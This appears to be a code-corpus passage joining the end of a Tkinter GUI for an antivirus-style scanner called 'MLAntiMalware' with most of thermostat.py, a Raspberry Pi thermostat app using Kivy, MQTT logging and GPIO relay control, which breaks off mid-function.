    folder (if any) and enter the Tk main loop."""
    global main
    global update_button
    global scan_button
    # NOTE(review): duplicated global declaration below (harmless).
    global url_scan_button
    global url_scan_button
    global quit_button
    global text_box
    global li
    global b_delete
    global b_delete_all
    global b_restore
    global b_restore_all
    global b_add_file
    # Fixed-size, non-resizable main window.
    main = tkinter.Tk()
    main.title("MLAntiMalware")
    main.wm_iconbitmap("")
    main.geometry("800x192")
    main.resizable(False, False)
    # hoehe/breite: German for height/width (shared button dimensions).
    hoehe = 2
    breite = 16
    # Left-hand column of main action buttons.
    scan_button = tkinter.Button(main,text = "Scan", command=lambda:button_action_handler("scan_button"), height = hoehe, width = breite)
    scan_button.grid(row = 0, column = 0)
    update_button = tkinter.Button(main,text = "Update", command=lambda:button_action_handler("update_button"), height = hoehe, width = breite)
    update_button.grid(row = 1, column = 0)
    quarantine_button = tkinter.Button(main,text = "Quarantine", command=lambda:button_action_handler("quarantine_button"), height = hoehe, width = breite)
    quarantine_button.grid(row = 3, column = 0)
    quit_button = tkinter.Button(main,text = "Close", command=lambda:button_action_handler("quit_button"), height = hoehe, width = breite)
    quit_button.grid(row = 4, column = 0, sticky="w")
    # Quarantine side-panel buttons; placed once so they have coordinates,
    # then immediately hidden until the Quarantine button toggles them.
    b_delete = tkinter.Button(main,text = "Remove current", height=0, width = 21, justify=CENTER)
    b_delete_all = tkinter.Button(main,text = "Remove all", height = 0, width = 21, justify=CENTER)
    b_restore = tkinter.Button(main,text = "Restore current", height=0, width = 21, justify=CENTER)
    b_restore_all = tkinter.Button(main,text = "Restore all", height = 0, width = 21, justify=CENTER)
    b_add_file = tkinter.Button(main,text = "Add file", height = 0, width = 21, justify=CENTER)
    b_delete.place(x = 605, y = 61)
    b_delete_all.place(x = 605, y = 86)
    b_restore.place(x = 605, y = 111)
    b_restore_all.place(x = 605, y = 136)
    b_add_file.place(x = 605, y = 161)
    b_delete.place_forget()
    b_delete_all.place_forget()
    b_restore.place_forget()
    b_restore_all.place_forget()
    b_add_file.place_forget()
    # Central scrolling log area.
    text_box = tkinter.scrolledtext.ScrolledText(main)
    text_box.place(height = 192, width = 454,x = 153, y = 0)
    # Quarantine listbox, hidden until toggled.
    li = tkinter.Listbox(main, height=3, width = 24)
    li.place(x = 605, y = 3)
    li.place_forget()
    text_box.insert(END, "Your System is Protected\n", "VIP")
    text_box.tag_config("VIP", background='yellow')
    text_box.insert(END, "[ + ] Preparing the program\n", 'positive')
    text_box.tag_config('positive', foreground='green')
    text_box.see(END)
    text_box.update()
    # On startup, scan the most recently created file matching the
    # module-level 'transfer' glob pattern, if one exists.
    list_of_files = glob.glob(transfer)
    if(len(list_of_files)>0):
        latest_file = max(list_of_files, key=os.path.getctime)
        automatic_scan(latest_file)
    main.mainloop()
# Run the whole Tk GUI on a worker thread.
# NOTE(review): Tkinter is generally only safe from the thread that created
# the widgets, and other worker threads here touch text_box/li directly --
# verify this holds up on the target platform.
t_main = Thread(target=gui_thread)
t_main.start()
|
thermostat.py | ### BEGIN LICENSE
# Copyright (c) 2015 Andrzej Taramina <andrzej@chaeron.com>
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
### END LICENSE
##############################################################################
# #
# Core Imports #
# #
##############################################################################
import threading
import math
import os, os.path, sys
import time
import datetime
import urllib2
import json
import random
import socket
import re
##############################################################################
# #
# Kivy UI Imports #
# #
##############################################################################
import kivy
kivy.require( '1.9.0' ) # replace with your current kivy version !
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.label import Label
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.slider import Slider
from kivy.clock import Clock
from kivy.graphics import Color, Rectangle
from kivy.storage.jsonstore import JsonStore
from kivy.uix.screenmanager import ScreenManager, Screen, NoTransition
##############################################################################
# #
# Other Imports #
# #
##############################################################################
import cherrypy
import schedule
##############################################################################
# #
# GPIO & Simulation Imports #
# #
##############################################################################
try:
import RPi.GPIO as GPIO
except ImportError:
import FakeRPi.GPIO as GPIO
##############################################################################
# #
# Sensor Imports #
# #
##############################################################################
#from w1thermsensor import W1ThermSensor
import smbus
import time
##############################################################################
# #
# MQTT Imports (used for logging and/or external sensors) #
# #
##############################################################################
try:
import paho.mqtt.client as mqtt
import paho.mqtt.publish as publish
mqttAvailable = True
except ImportError:
mqttAvailable = False
##############################################################################
# #
# Utility classes #
# #
##############################################################################
class switch(object):
    """Tiny switch/case helper (classic Python recipe).

    Iterate the instance to obtain its match() callable once, test
    candidate values with it, and after a value matches every following
    case "falls through" (matches unconditionally), e.g.::

        for case in switch(value):
            if case('a'): ...; break
            if case():    ...  # default
    """
    def __init__(self, value):
        self.value = value
        self.fall = False  # becomes True once a case has matched

    def __iter__(self):
        """Yield the match method once, then stop."""
        yield self.match
        # Fixed for PEP 479: 'raise StopIteration' inside a generator is a
        # RuntimeError on Python 3.7+; a plain return ends the generator
        # identically on both Python 2 and 3.
        return

    def match(self, *args):
        """Indicate whether or not to enter a case suite."""
        if self.fall or not args:
            # Fall-through after a prior match, or the no-arg default case.
            return True
        elif self.value in args:  # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##############################################################################
# #
# MySensor.org Controller compatible translated constants #
# #
##############################################################################
# Message types in the MySensors.org controller vocabulary: "set" carries a
# value update, "presentation" announces a device at startup.
MSG_TYPE_SET = "set"
MSG_TYPE_PRESENTATION = "presentation"
# Logical child-device names for this node; these strings appear in MQTT
# topics and log records.
CHILD_DEVICE_NODE = "node"
CHILD_DEVICE_MQTT = "mqtt"
CHILD_DEVICE_UICONTROL_HEAT = "heatControl"
CHILD_DEVICE_UICONTROL_COOL = "coolControl"
CHILD_DEVICE_UICONTROL_FAN = "fanControl"
CHILD_DEVICE_UICONTROL_HOLD = "holdControl"
CHILD_DEVICE_UICONTROL_SLIDER = "tempSlider"
CHILD_DEVICE_WEATHER_CURR = "weatherCurrent"
CHILD_DEVICE_WEATHER_FCAST_TODAY = "weatherForecastToday"
CHILD_DEVICE_WEATHER_FCAST_TOMO = "weatherForecastTomorrow"
CHILD_DEVICE_HEAT = "heat"
CHILD_DEVICE_COOL = "cool"
CHILD_DEVICE_FAN = "fan"
CHILD_DEVICE_PIR = "motionSensor"
CHILD_DEVICE_TEMP = "temperatureSensor"
CHILD_DEVICE_SCREEN = "screen"
CHILD_DEVICE_SCHEDULER = "scheduler"
CHILD_DEVICE_WEBSERVER = "webserver"
# Every child device; used below to send a presentation message for each.
CHILD_DEVICES = [
    CHILD_DEVICE_NODE,
    CHILD_DEVICE_MQTT,
    CHILD_DEVICE_UICONTROL_HEAT,
    CHILD_DEVICE_UICONTROL_COOL,
    CHILD_DEVICE_UICONTROL_FAN,
    CHILD_DEVICE_UICONTROL_HOLD,
    CHILD_DEVICE_UICONTROL_SLIDER,
    CHILD_DEVICE_WEATHER_CURR,
    CHILD_DEVICE_WEATHER_FCAST_TODAY,
    CHILD_DEVICE_WEATHER_FCAST_TOMO,
    CHILD_DEVICE_HEAT,
    CHILD_DEVICE_COOL,
    CHILD_DEVICE_FAN,
    CHILD_DEVICE_PIR,
    CHILD_DEVICE_TEMP,
    CHILD_DEVICE_SCREEN,
    CHILD_DEVICE_SCHEDULER,
    CHILD_DEVICE_WEBSERVER
]
# Suffix appended to stripped UI button labels to form their child-device
# name (e.g. "heat" + "Control").
CHILD_DEVICE_SUFFIX_UICONTROL = "Control"
# Message subtypes (MySensors.org vocabulary).
MSG_SUBTYPE_NAME = "sketchName"
MSG_SUBTYPE_VERSION = "sketchVersion"
MSG_SUBTYPE_BINARY_STATUS = "binaryStatus"
# Fixed: the "armed"/"tripped" strings were swapped between these two
# constants, so armed-state logs went out tagged "tripped" and vice versa.
MSG_SUBTYPE_TRIPPED = "tripped"
MSG_SUBTYPE_ARMED = "armed"
MSG_SUBTYPE_TEMPERATURE = "temperature"
MSG_SUBTYPE_FORECAST = "forecast"
MSG_SUBTYPE_CUSTOM = "custom"
MSG_SUBTYPE_TEXT = "text"
##############################################################################
# #
# Settings #
# #
##############################################################################
# Version string reported in the startup presentation messages.
THERMOSTAT_VERSION = "1.9.9"
# Debug settings
debug = False
useTestSchedule = False
# Threading Locks
# RLocks where the same thread may re-enter (UI + control logic); a plain
# Lock suffices for the weather fetches.
thermostatLock = threading.RLock()
weatherLock = threading.Lock()
scheduleLock = threading.RLock()
# Thermostat persistent settings
# JsonStore files are created/read in the current working directory.
settings = JsonStore( "thermostat_settings.json" )
state = JsonStore( "thermostat_state.json" )
# MQTT settings/setup
def mqtt_on_connect( client, userdata, flags, rc ):
    """paho-mqtt on_connect callback.

    Logs the (re)connect and re-subscribes to the restart / loglevel /
    version command topics. rc == 0 means the broker accepted the
    connection; any other code is only echoed via the print above.
    """
    global mqttReconnect
    print( "MQTT Connected with result code: " + str( rc ) )
    if rc == 0:
        if mqttReconnect:
            log( LOG_LEVEL_STATE, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Reconnected to: " + mqttServer + ":" + str( mqttPort ) )
        else:
            mqttReconnect = True
            log( LOG_LEVEL_STATE, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Connected to: " + mqttServer + ":" + str( mqttPort ) )
        # Subscribe on every (re)connect so a broker restart does not
        # silently drop our command subscriptions.
        src = client.subscribe( [
                ( mqttSub_restart, 0 ),     # Subscribe to restart commands
                ( mqttSub_loglevel, 0 ),    # Subscribe to log level commands
                ( mqttSub_version, 0 )      # Subscribe to version commands
            ] )
        if src[ 0 ] == 0:
            log( LOG_LEVEL_INFO, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Subscribe Succeeded: " + mqttServer + ":" + str( mqttPort ) )
        else:
            # Fixed: src[0] is an int; concatenating it to a str raised
            # TypeError here and masked the real subscribe failure.
            log( LOG_LEVEL_ERROR, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Subscribe FAILED, result code: " + str( src[ 0 ] ) )
# Pull MQTT connection settings (with defaults when no "mqtt" section
# exists); MQTT is disabled outright when paho-mqtt failed to import.
if mqttAvailable:
    mqttReconnect = False
    mqttEnabled = False if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "enabled" ]
    mqttClientID = 'thermostat' if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "clientID" ]
    mqttServer = 'localhost' if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "server" ]
    mqttPort = 1883 if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "port" ]
    mqttPubPrefix = "thermostat" if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "pubPrefix" ]
    # Command topics this node listens on: <prefix>/<clientID>/command/<cmd>
    mqttSub_version = str( mqttPubPrefix + "/" + mqttClientID + "/command/version" )
    mqttSub_restart = str( mqttPubPrefix + "/" + mqttClientID + "/command/restart" )
    mqttSub_loglevel = str( mqttPubPrefix + "/" + mqttClientID + "/command/loglevel" )
else:
    mqttEnabled = False
if mqttEnabled:
    mqttc = mqtt.Client( mqttClientID )
    mqttc.on_connect = mqtt_on_connect
    # restart()/setLogLevel()/getVersion() are presumably defined later in
    # the file -- TODO confirm; not visible in this chunk.
    mqttc.message_callback_add( mqttSub_restart, lambda client, userdata, message: restart() )
    mqttc.message_callback_add( mqttSub_loglevel, lambda client, userdata, message: setLogLevel( message ) )
    mqttc.message_callback_add( mqttSub_version, lambda client, userdata, message: getVersion() )
# Logging settings/setup
LOG_FILE_NAME = "thermostat.log"
LOG_ALWAYS_TIMESTAMP = True
# Numeric levels; a record is emitted when its level >= logLevel.
# Note STATE (4) outranks ERROR (3): state changes are the last category
# filtered out before logging is effectively off (NONE).
LOG_LEVEL_DEBUG = 1
LOG_LEVEL_INFO = 2
LOG_LEVEL_ERROR = 3
LOG_LEVEL_STATE = 4
LOG_LEVEL_NONE = 5
# Name -> level, used when parsing the configured level string.
LOG_LEVELS = {
    "debug": LOG_LEVEL_DEBUG,
    "info": LOG_LEVEL_INFO,
    "state": LOG_LEVEL_STATE,
    "error": LOG_LEVEL_ERROR
}
# Reverse map (level -> name) used when composing log records.
LOG_LEVELS_STR = { v: k for k, v in LOG_LEVELS.items() }
# Handle for the 'file' logging channel; opened below only when selected.
logFile = None
def log_dummy( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
    """No-op logging sink, used when the 'none' channel is selected (or a
    configured channel is unavailable). Accepts and discards everything."""
    return None
def log_mqtt( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
    """Publish a log record to MQTT under
    <pubPrefix>/sensor/log/<level>/<clientID>/<device>/<type>/<subtype>.

    Records below the module-wide logLevel are dropped. With single=True a
    one-shot connection is used (publish.single); otherwise the record
    goes out on the persistent client.
    """
    if level < logLevel:
        return
    stamp = datetime.datetime.now().strftime( "%Y-%m-%dT%H:%M:%S%z " ) if LOG_ALWAYS_TIMESTAMP or timestamp else ""
    topic = "/".join( [ mqttPubPrefix, "sensor", "log", LOG_LEVELS_STR[ level ], mqttClientID, child_device, msg_type, msg_subtype ] )
    body = stamp + msg
    if single:
        publish.single( topic, body, hostname=mqttServer, port=mqttPort, client_id=mqttClientID )
    else:
        mqttc.publish( topic, body )
def log_file( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
    """Append a timestamped record to the module-wide logFile handle.

    Records below the module-wide logLevel are dropped; *timestamp* and
    *single* are accepted for signature compatibility but ignored.
    """
    if level < logLevel:
        return
    stamp = datetime.datetime.now().strftime( "%Y-%m-%dT%H:%M:%S%z " )
    record = stamp + LOG_LEVELS_STR[ level ] + "/" + child_device + "/" + msg_type + "/" + msg_subtype + ": " + msg + "\n"
    logFile.write( record )
def log_print( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
    """Print a log record to stdout (the 'print' logging channel).

    Records below the module-wide logLevel are dropped; the timestamp is
    included when LOG_ALWAYS_TIMESTAMP or *timestamp* is set.
    """
    if level < logLevel:
        return
    stamp = datetime.datetime.now().strftime( "%Y-%m-%dT%H:%M:%S%z " ) if LOG_ALWAYS_TIMESTAMP or timestamp else ""
    print( stamp + LOG_LEVELS_STR[ level ] + "/" + child_device + "/" + msg_type + "/" + msg_subtype + ": " + msg )
# Select the active logging backend from settings ("logging" section).
loggingChannel = "none" if not( settings.exists( "logging" ) ) else settings.get( "logging" )[ "channel" ]
loggingLevel = "state" if not( settings.exists( "logging" ) ) else settings.get( "logging" )[ "level" ]
for case in switch( loggingChannel ):
    if case( 'none' ):
        log = log_dummy
        break
    if case( 'mqtt' ):
        # MQTT logging only works when the broker client is configured.
        if mqttEnabled:
            log = log_mqtt
        else:
            log = log_dummy
        break
    if case( 'file' ):
        log = log_file
        # NOTE(review): buffering=0 ("unbuffered") is only valid for
        # binary mode on Python 3; fine on Python 2 (cf. the urllib2
        # import above) but raises ValueError under Python 3.
        logFile = open( LOG_FILE_NAME, "a", 0 )
        break
    if case( 'print' ):
        log = log_print
        break
    if case(): # default
        log = log_dummy
# Unknown level names fall back to LOG_LEVEL_NONE (log nothing).
logLevel = LOG_LEVELS.get( loggingLevel, LOG_LEVEL_NONE )
if mqttEnabled:
    # Make sure we can reach the mqtt server by pinging it (waits up to
    # ~100 s so a slow network boot doesn't kill the connect call).
    pingCount = 0
    pingCmd = "ping -c 1 " + mqttServer
    while os.system( pingCmd ) != 0 and pingCount <= 100:
        # Fixed: the original used C-style '++pingCount', which Python
        # parses as a double unary plus (a no-op), so the retry counter
        # never advanced and the loop could spin forever.
        pingCount += 1
        time.sleep( 1 )
    mqttc.connect( mqttServer, mqttPort )
    # Background network loop thread handles reconnects and callbacks.
    mqttc.loop_start()
# Send presentations for Node
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_NAME, "Thermostat Starting Up...", msg_type=MSG_TYPE_PRESENTATION )
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_VERSION, THERMOSTAT_VERSION, msg_type=MSG_TYPE_PRESENTATION )
# Send presentations for all other child "sensors" (direct iteration
# instead of the original range(len(...)) indexing).
for child in CHILD_DEVICES:
    if child != CHILD_DEVICE_NODE:
        log( LOG_LEVEL_STATE, child, child, "", msg_type=MSG_TYPE_PRESENTATION )
# Various temperature settings:
# Unit-dependent display/conversion factors ("metric" vs imperial).
tempScale = settings.get( "scale" )[ "tempScale" ]
scaleUnits = "c" if tempScale == "metric" else "f"
precipUnits = " mm" if tempScale == "metric" else '"'
precipFactor = 1.0 if tempScale == "metric" else 0.0393701
precipRound = 0 if tempScale == "metric" else 1
#sensorUnits = W1ThermSensor.DEGREES_C if tempScale == "metric" else W1ThermSensor.DEGREES_F
windFactor = 3.6 if tempScale == "metric" else 1.0
windUnits = " km/h" if tempScale == "metric" else " mph"
TEMP_TOLERANCE = 0.1 if tempScale == "metric" else 0.18
# Seed value displayed until a real sensor reading arrives.
currentTemp = 22.0 if tempScale == "metric" else 72.0
# Sentinel so the first corrected reading is always treated as a change.
priorCorrected = -100.0
# Set point restored from the persisted state file when present.
setTemp = 22.0 if not( state.exists( "state" ) ) else state.get( "state" )[ "setTemp" ]
#tempHysteresis = 0.5 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "tempHysteresis" ]
tempHysteresis = 1
tempCheckInterval = 3 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "tempCheckInterval" ]
# Minimal-UI (dimmed screen) options.
minUIEnabled = 0 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "minUIEnabled" ]
minUITimeout = 3 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "minUITimeout" ]
minUITimer = None
# Echo the effective settings to the log, one record per value.
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/tempScale", str( tempScale ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/scaleUnits", str( scaleUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/precipUnits", str( precipUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/precipFactor", str( precipFactor ), timestamp=False )
#log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/sensorUnits", str( sensorUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/windFactor", str( windFactor ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/windUnits", str( windUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/currentTemp", str( currentTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/setTemp", str( setTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/tempHysteresis", str( tempHysteresis ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/tempCheckInterval", str( tempCheckInterval ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/minUIEnabled", str( minUIEnabled ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/minUITimeout", str( minUITimeout ), timestamp=False )
# Temperature calibration settings:
# Two-point (freezing/boiling) calibration against the measured sensor
# values, with the boiling point corrected for elevation.
# Fixed: the guard checked settings.exists("thermostat") but then read the
# "calibration" section, so a config with "thermostat" and no "calibration"
# crashed with a KeyError. Guard on the section actually read.
# NOTE: boilingMeasured/freezingMeasured below still read "calibration"
# unconditionally, as in the original.
elevation = 0 if not( settings.exists( "calibration" ) ) else settings.get( "calibration" )[ "elevation" ]
boilingPoint = ( 100.0 - 0.003353 * elevation ) if tempScale == "metric" else ( 212.0 - 0.00184 * elevation )
freezingPoint = 0.01 if tempScale == "metric" else 32.018
referenceRange = boilingPoint - freezingPoint
boilingMeasured = settings.get( "calibration" )[ "boilingMeasured" ]
freezingMeasured = settings.get( "calibration" )[ "freezingMeasured" ]
measuredRange = boilingMeasured - freezingMeasured
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/elevation", str( elevation ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/boilingPoint", str( boilingPoint ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/freezingPoint", str( freezingPoint ), timestamp=False )
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/referenceRange", str( referenceRange ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/boilingMeasured", str( boilingMeasured ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/freezingMeasured", str( freezingMeasured ), timestamp=False )
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/measuredRange", str( measuredRange ), timestamp=False )
# UI Slider settings:
# Range and granularity for the set-point slider.
minTemp = 15.0 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "minTemp" ]
maxTemp = 30.0 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "maxTemp" ]
tempStep = 0.5 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "tempStep" ]
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/UISlider/minTemp", str( minTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/UISlider/maxTemp", str( maxTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/UISlider/tempStep", str( tempStep ), timestamp=False )
# Vestigial sensor probe: the W1ThermSensor import above is commented out,
# so this just marks "sensor present" with the constant 1.
# NOTE(review): the bare except is unreachable as written (assigning 1
# cannot fail) and would hide real errors if sensor init is restored.
try:
    tempSensor = 1
except:
    tempSensor = None
# PIR (Motion Sensor) setup:
pirEnabled = 0 if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirEnabled" ]
pirPin = 5 if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirPin" ]
pirCheckInterval = 0.5 if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirCheckInterval" ]
# Daily window ("HH:MM" strings) during which motion events are ignored.
pirIgnoreFromStr = "00:00" if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirIgnoreFrom" ]
pirIgnoreToStr = "00:00" if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirIgnoreTo" ]
# Parse the "HH:MM" strings into datetime.time objects for comparisons.
pirIgnoreFrom = datetime.time( int( pirIgnoreFromStr.split( ":" )[ 0 ] ), int( pirIgnoreFromStr.split( ":" )[ 1 ] ) )
pirIgnoreTo = datetime.time( int( pirIgnoreToStr.split( ":" )[ 0 ] ), int( pirIgnoreToStr.split( ":" )[ 1 ] ) )
log( LOG_LEVEL_INFO, CHILD_DEVICE_PIR, MSG_SUBTYPE_ARMED, str( pirEnabled ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/pir/checkInterval", str( pirCheckInterval ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/pir/ignoreFrom", str( pirIgnoreFromStr ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/pir/ignoreTo", str( pirIgnoreToStr ), timestamp=False )
# GPIO Pin setup and utility routines:
coolPin = 18 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "coolPin" ]
heatPin = 23 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "heatPin" ]
fanPin = 25 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "fanPin" ]
# BCM pin numbering; all three relay outputs start de-energised (LOW).
GPIO.setmode( GPIO.BCM )
GPIO.setup( coolPin, GPIO.OUT )
GPIO.output( coolPin, GPIO.LOW )
GPIO.setup( heatPin, GPIO.OUT )
GPIO.output( heatPin, GPIO.LOW )
GPIO.setup( fanPin, GPIO.OUT )
GPIO.output( fanPin, GPIO.LOW )
if pirEnabled:
    GPIO.setup( pirPin, GPIO.IN )
# NOTE(review): redundant re-assignments -- these three constants already
# hold identical values from the block near the top of the file.
CHILD_DEVICE_HEAT = "heat"
CHILD_DEVICE_COOL = "cool"
CHILD_DEVICE_FAN = "fan"
# Report which pin each function is wired to.
log( LOG_LEVEL_INFO, CHILD_DEVICE_COOL, MSG_SUBTYPE_BINARY_STATUS, str( coolPin ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_HEAT, MSG_SUBTYPE_BINARY_STATUS, str( heatPin ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_FAN, MSG_SUBTYPE_BINARY_STATUS, str( fanPin ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_PIR, MSG_SUBTYPE_TRIPPED, str( pirPin ), timestamp=False )
##############################################################################
# #
# UI Controls/Widgets #
# #
##############################################################################
# RGBA colours applied to a ToggleButton while it is active; keyed by the
# button label with the [b]...[/b] markup stripped (see setControlState).
controlColours = {
    "normal": ( 1.0, 1.0, 1.0, 1.0 ),
    "Cool": ( 0.0, 0.0, 1.0, 0.4 ),
    # Heat is fully opaque unlike the others -- presumably deliberate
    # emphasis; confirm.
    "Heat": ( 1.0, 0.0, 0.0, 1.0 ),
    "Fan": ( 0.0, 1.0, 0.0, 0.4 ),
    "Hold": ( 0.0, 1.0, 0.0, 0.4 ),
}
def setControlState( control, state ):
    """Set a mode ToggleButton's state and matching background colour,
    then log the resulting on/off status -- all under the thermostat
    lock. *state* is the Kivy button state ("normal" or "down")."""
    with thermostatLock:
        control.state = state
        # Strip the bold markup once; the bare label doubles as the
        # controlColours key and (lowercased) as the log device name.
        label = control.text.replace( "[b]", "" ).replace( "[/b]", "" )
        if state == "normal":
            control.background_color = controlColours[ "normal" ]
        else:
            control.background_color = controlColours[ label ]
        log( LOG_LEVEL_STATE, label.lower() + CHILD_DEVICE_SUFFIX_UICONTROL, MSG_SUBTYPE_BINARY_STATUS, "0" if state == "normal" else "1" )
# The four mode ToggleButtons; each is restored to its last persisted
# state (thermostat_state.json) at startup via setControlState().
coolControl = ToggleButton( text="[b]Cool[/b]",
                            markup=True,
                            size_hint = ( None, None )
                            )
setControlState( coolControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "coolControl" ] )
heatControl = ToggleButton( text="[b]Heat[/b]",
                            markup=True,
                            size_hint = ( None, None )
                            )
setControlState( heatControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "heatControl" ] )
fanControl = ToggleButton( text="[b]Fan[/b]",
                           markup=True,
                           size_hint = ( None, None )
                           )
setControlState( fanControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "fanControl" ] )
holdControl = ToggleButton( text="[b]Hold[/b]",
                            markup=True,
                            size_hint = ( None, None )
                            )
setControlState( holdControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "holdControl" ] )
def get_status_string():
    # Build the multi-line Kivy-markup status text shown in the sidebar:
    # relay states read directly from the GPIO output pins, plus which
    # schedule source is currently driving the set point.
    with thermostatLock:
        sched = "None"
        # Precedence: Hold overrides everything, then the test schedule,
        # then whichever mode button is engaged.
        if holdControl.state == "down":
            sched = "Hold"
        elif useTestSchedule:
            sched = "Test"
        elif heatControl.state == "down":
            sched = "Heat"
        elif coolControl.state == "down":
            sched = "Cool"
        return "[b]System:[/b]\n " + \
